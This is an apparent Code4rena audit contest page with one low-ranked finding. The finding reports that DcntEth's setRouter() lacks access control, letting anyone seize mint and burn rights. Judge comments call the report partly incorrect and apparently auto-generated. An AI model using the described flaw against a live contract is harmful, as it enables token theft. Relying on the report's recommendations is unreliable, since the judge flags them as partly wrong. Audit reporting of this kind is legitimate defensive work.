Platform: Code4rena
Start Date: 19/01/2024
Pot Size: $36,500 USDC
Total HM: 9
Participants: 113
Period: 3 days
Judge: 0xsomeone
Id: 322
League: ETH
Rank: 102/113
Findings: 1
Award: $0.09
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: NPCsCorp
Also found by: 0x11singh99, 0xAadi, 0xBugSlayer, 0xE1, 0xPluto, 0xSimeon, 0xSmartContract, 0xabhay, 0xdice91, 0xprinc, Aamir, Aymen0909, CDSecurity, DadeKuma, DarkTower, EV_om, Eeyore, GeekyLumberjack, GhK3Ndf, Giorgio, Greed, Inference, JanuaryPersimmon2024, Kaysoft, Krace, Matue, MrPotatoMagic, NentoR, Nikki, PUSH0, Soliditors, Tendency, Tigerfrake, Timeless, Timenov, ZanyBonzy, ZdravkoHr, abiih, adeolu, al88nsk, azanux, bareli, boredpukar, cu5t0mpeo, d4r3d3v1l, darksnow, deth, dutra, ether_sky, haxatron, ke1caM, kodyvim, m4ttm, mgf15, mrudenko, nmirchev8, nobody2018, nuthan2x, peanuts, piyushshukla, ravikiranweb3, rouhsamad, seraviz, simplor, slylandro_star, stealth, th13vn, vnavascues, wangxx2026, zaevlad
0.0879 USDC - $0.09
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L20-L22 https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L24-L26 https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L28-L30
The DcntEth contract extends the OFTV2 contract and overrides its minting and burning functions to include additional checks. The contract also includes a setRouter() function to set the router address, which is required to call the mint() and burn() functions.
The router property is a public address variable. This address is used to control who can mint and burn tokens.
The onlyRouter modifier is used to restrict certain functions (mint and burn) to be called only by the router address.
The setRouter() function allows the router address to be updated.
The mint() and burn() functions are used to increase and decrease the supply of tokens. These functions can only be called by the router address due to the onlyRouter modifier.
However, the DcntEth contract lacks sufficient access control, which can lead to several potential attack vectors.
Here are some detailed explanations:
The setRouter() function allows any address to update the router address.
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L20
function setRouter(address _router) public {
An attacker could call this function and set the router to their own address. Once they have done this, they can mint and burn tokens freely, manipulating the token supply. They could also burn tokens from other holders, causing them to lose value.
The router address has significant power in the contract because it can mint and burn tokens.
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L24-L26
function mint(address _to, uint256 _amount) public onlyRouter {
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L28-L30
function burn(address _from, uint256 _amount) public onlyRouter {
If this address is compromised, an attacker could gain control over the token supply.
The setRouter() function doesn't check whether the new router is valid.
function setRouter(address _router) public { router = _router; }
This could lead to unexpected behavior if the new router is not capable of handling the minting and burning operations.
Manual Review VS code
To secure this contract against these attacks, you should
implement additional access controls, decentralize the decision-making process, add checks in the setRouter() function
Access Control
#0 - c4-pre-sort
2024-01-23T23:16:45Z
raymondfam marked the issue as sufficient quality report
#1 - c4-pre-sort
2024-01-23T23:16:52Z
raymondfam marked the issue as duplicate of #14
#2 - alex-ppg
2024-02-03T13:30:20Z
The overall submission contains some incorrect recommendations and its contents appear to be automatically generated.
#3 - c4-judge
2024-02-03T13:30:24Z
alex-ppg marked the issue as partial-75